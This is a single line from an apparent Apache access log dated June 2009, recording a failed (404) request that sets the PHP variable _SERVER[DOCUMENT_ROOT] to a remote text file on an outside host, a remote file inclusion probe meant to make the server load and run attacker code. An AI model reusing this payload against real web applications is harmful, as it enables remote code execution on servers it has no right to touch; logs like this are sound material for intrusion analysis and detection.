218.150.78.245 - - [26/Jun/2009:15:58:37 -0500] "GET /logs/access_log.1239753600///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
